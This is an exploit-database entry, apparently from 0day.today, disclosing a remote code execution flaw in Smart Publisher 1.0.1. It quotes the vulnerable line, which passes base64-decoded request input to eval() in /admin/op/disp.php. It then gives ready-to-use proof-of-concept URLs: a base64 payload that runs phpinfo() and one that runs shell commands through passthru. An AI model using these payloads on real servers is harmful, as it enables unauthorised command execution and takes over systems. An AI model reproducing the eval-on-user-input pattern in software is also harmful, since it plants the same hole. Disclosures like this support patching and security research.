id: 2560
date: 01/29/2008
title: Smart Publisher 1.0.1 (disp.php) Remote Code Execution Vulnerability
author: GoLd_M
cves: 

====================================================================
Smart Publisher 1.0.1 (disp.php) Remote Code Execution Vulnerability
====================================================================



              ######    ######                 ##############               ######  ######                      ########          ##    
                ####      ##                   ##    ##    ##                 ##      ##                      ##      ##                
  ########      ##  ##    ##      ########           ##       ####  ######      ##  ##        ########      ##                ######    
##        ##    ##  ##    ##    ##        ##         ##         ####            ##  ##      ##        ##    ##                    ##    
  ##########    ##    ##  ##      ##########         ##         ##                ##          ##########    ##      ######        ##    
##        ##    ##    ##  ##    ##        ##         ##         ##                ##        ##        ##    ##        ##          ##    
##        ##    ##      ####    ##        ##  ###    ##         ##                ##        ##        ##      ##      ##          ##    
  #########   ######    ####      #########   ###  ######     ##########        ######        ##########        ######        ##########

                            ######################################################################
                            ### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
                            ### Script : http://sourceforge.net/projects/smart-publisher/      ###
                            ### Vuln Code In '/admin/op/disp.php'In Line '3'                   ###
                            ### eval("\$v=".base64_decode($filedata).";"); <- Vuln             ###
                            ### POC :                                                          ###
                            ### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64   ###
                            ### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
                            ######################################################################




#  0day.today [2023-03-27]  #